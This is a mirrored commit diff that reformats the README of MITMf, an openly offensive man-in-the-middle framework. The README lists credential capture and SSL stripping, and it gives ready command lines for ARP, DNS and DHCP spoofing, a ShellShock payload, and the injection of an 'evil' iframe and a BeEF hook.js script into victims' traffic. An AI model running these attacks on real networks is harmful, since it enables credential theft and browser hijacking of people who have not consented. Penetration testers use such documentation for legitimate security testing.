mirror of
https://github.com/byt3bl33d3r/MITMf.git
synced 2025-07-30 03:38:27 -07:00
Update README.md
This commit is contained in:
byt3bl33d3r
parent
39e0ae0e88
commit
a024987c91
1 changed files with 22 additions and 14 deletions
36
README.md
36
README.md
|
|
@ -26,48 +26,57 @@ existing attacks and techniques.
|
||||||
Originally built to address the significant shortcomings of other tools (e.g Ettercap, Mallory), it's been almost completely
|
Originally built to address the significant shortcomings of other tools (e.g Ettercap, Mallory), it's been almost completely
|
||||||
re-written from scratch to provide a modular and easily extendible framework that anyone can use to implement their own MITM attack.
|
re-written from scratch to provide a modular and easily extendible framework that anyone can use to implement their own MITM attack.
|
||||||
|
|
||||||
Main Features
|
Features
|
||||||
=============
|
========
|
||||||
|
|
||||||
- The framework contains a built-in SMB, HTTP and DNS server that can be controlled and used by the various plugins it also contains a modified version of the SSLStrip proxy that allows for HTTP modification and a partial HSTS bypass.
|
- The framework contains a built-in SMB, HTTP and DNS server that can be controlled and used by the various plugins it also contains a modified version of the SSLStrip proxy that allows for HTTP modification and a partial HSTS bypass.
|
||||||
|
|
||||||
- As of version 0.9.8, MITMf supports active packet filtering and manipulation (basically what etterfilters did, only better),
|
- As of version 0.9.8, MITMf supports active packet filtering and manipulation (basically what etterfilters did, only better),
|
||||||
allowing users to modify any type of traffic or protocol.
|
allowing users to modify any type of traffic or protocol.
|
||||||
|
|
||||||
- The configuration file can be edited on-the-fly while MITMf is running and the changes will be passed down through the framework, this allows you to tweak settings of plugins and servers while performing an attack.
|
- The configuration file can be edited on-the-fly while MITMf is running, the changes will be passed down through the framework: this allows you to tweak settings of plugins and servers while performing an attack.
|
||||||
|
|
||||||
- MITMf will capture FTP, IRC, POP, IMAP, Telnet, SMTP, SNMP (community strings), NTLMv1/v2 (all supported protocols like HTTP, SMB, LDAP etc.) and Kerberos credentials by using [Net-Creds](https://github.com/DanMcInerney/net-creds), which is run on startup.
|
- MITMf will capture FTP, IRC, POP, IMAP, Telnet, SMTP, SNMP (community strings), NTLMv1/v2 (all supported protocols like HTTP, SMB, LDAP etc.) and Kerberos credentials by using [Net-Creds](https://github.com/DanMcInerney/net-creds), which is run on startup.
|
||||||
|
|
||||||
- [Responder](https://github.com/SpiderLabs/Responder) integration allows for LLMNR, NBT-NS and MDNS poisoning a rogue WPAD rouge server support.
|
- [Responder](https://github.com/SpiderLabs/Responder) integration allows for LLMNR, NBT-NS and MDNS poisoning and WPAD rogue server support.
|
||||||
|
|
||||||
Examples
|
Examples
|
||||||
========
|
========
|
||||||
|
|
||||||
- The most basic usage, just starts the HTTP proxy SMB,DNS,HTTP servers and Net-Creds on interface ```enp3s0```:
|
The most basic usage, just starts the HTTP proxy SMB,DNS,HTTP servers and Net-Creds on interface enp3s0:
|
||||||
|
|
||||||
```python mitmf.py -i enp3s0```
|
```python mitmf.py -i enp3s0```
|
||||||
|
|
||||||
- ARP poison 192.168.1.0/24 with the gateway at 192.168.1.1 using the **Spoof** plugin:
|
ARP poison 192.168.1.0/24 with the gateway at 192.168.1.1 using the **Spoof** plugin:
|
||||||
|
|
||||||
```python mitmf.py -i enp3s0 --spoof --arp --target 192.168.1.0/24 --gateway 192.168.1.1```
|
```python mitmf.py -i enp3s0 --spoof --arp --target 192.168.1.0/24 --gateway 192.168.1.1```
|
||||||
|
|
||||||
- Same as above + a WPAD rougue proxy server using the **Responder** plugin:
|
Same as above + a WPAD rougue proxy server using the **Responder** plugin:
|
||||||
|
|
||||||
```python mitmf.py -i enp3s0 --spoof --arp --target 192.168.0.0/24 --gateway 192.168.1.1 --responder --wpad```
|
```python mitmf.py -i enp3s0 --spoof --arp --target 192.168.0.0/24 --gateway 192.168.1.1 --responder --wpad```
|
||||||
|
|
||||||
- Enable DNS spoofing while ARP poisoning (Domains to spoof are pulled from the config file):
|
Enable DNS spoofing while ARP poisoning (Domains to spoof are pulled from the config file):
|
||||||
|
|
||||||
```python mitmf.py -i enp3s0 --spoof --dns --arp --target 192.168.1.0/24 --gateway 192.168.1.1```
|
```python mitmf.py -i enp3s0 --spoof --dns --arp --target 192.168.1.0/24 --gateway 192.168.1.1```
|
||||||
|
|
||||||
- Enable LLMNR/NBTNS/MDNS spoofing:
|
Enable LLMNR/NBTNS/MDNS spoofing:
|
||||||
|
|
||||||
```python mitmf.py -i enp3s0 --responder --wredir --nbtns```
|
```python mitmf.py -i enp3s0 --responder --wredir --nbtns```
|
||||||
|
|
||||||
- Enable DHCP spoofing (the ip pool and subnet are pulled from the config file):
|
Enable DHCP spoofing (the ip pool and subnet are pulled from the config file):
|
||||||
|
|
||||||
```python mitmf.py -i enp3s0 --spoof --dhcp```
|
```python mitmf.py -i enp3s0 --spoof --dhcp```
|
||||||
|
|
||||||
- Same as above with a ShellShock payload that will be executed if any client is vulnerable:
|
Same as above with a ShellShock payload that will be executed if any client is vulnerable:
|
||||||
|
|
||||||
```python mitmf.py -i enp3s0 --spoof --dhcp --shellshock 'echo 0wn3d'```
|
```python mitmf.py -i enp3s0 --spoof --dhcp --shellshock 'echo 0wn3d'```
|
||||||
|
|
||||||
- Inject an HTML IFrame using the **Inject** plugin:
|
Inject an HTML IFrame using the **Inject** plugin:
|
||||||
|
|
||||||
```python mitmf.py -i enp3s0 --inject --html-url http://some-evil-website.com```
|
```python mitmf.py -i enp3s0 --inject --html-url http://some-evil-website.com```
|
||||||
|
|
||||||
- Inject a JS script:
|
Inject a JS script:
|
||||||
|
|
||||||
```python mitmf.py -i enp3s0 --inject --js-url http://beef:3000/hook.js```
|
```python mitmf.py -i enp3s0 --inject --js-url http://beef:3000/hook.js```
|
||||||
|
|
||||||
And much much more! Of course you can mix and match almost any plugin together (e.g. ARP spoof + inject + Responder etc..)
|
And much much more! Of course you can mix and match almost any plugin together (e.g. ARP spoof + inject + Responder etc..)
|
||||||
|
|
@ -103,7 +112,6 @@ Installation
|
||||||
============
|
============
|
||||||
|
|
||||||
- Clone this repository
|
- Clone this repository
|
||||||
- ```apt-get install build-essential python-dev libnetfilter-queue-dev``` for active packet filtering/modification
|
|
||||||
- Run the ```setup.sh``` script
|
- Run the ```setup.sh``` script
|
||||||
- Run the command ```pip install --upgrade -r requirements.txt``` to install all Python dependencies
|
- Run the command ```pip install --upgrade -r requirements.txt``` to install all Python dependencies
|
||||||
|
|
||||||
|
|
|
||||||
Loading…
Add table
Add a link
Reference in a new issue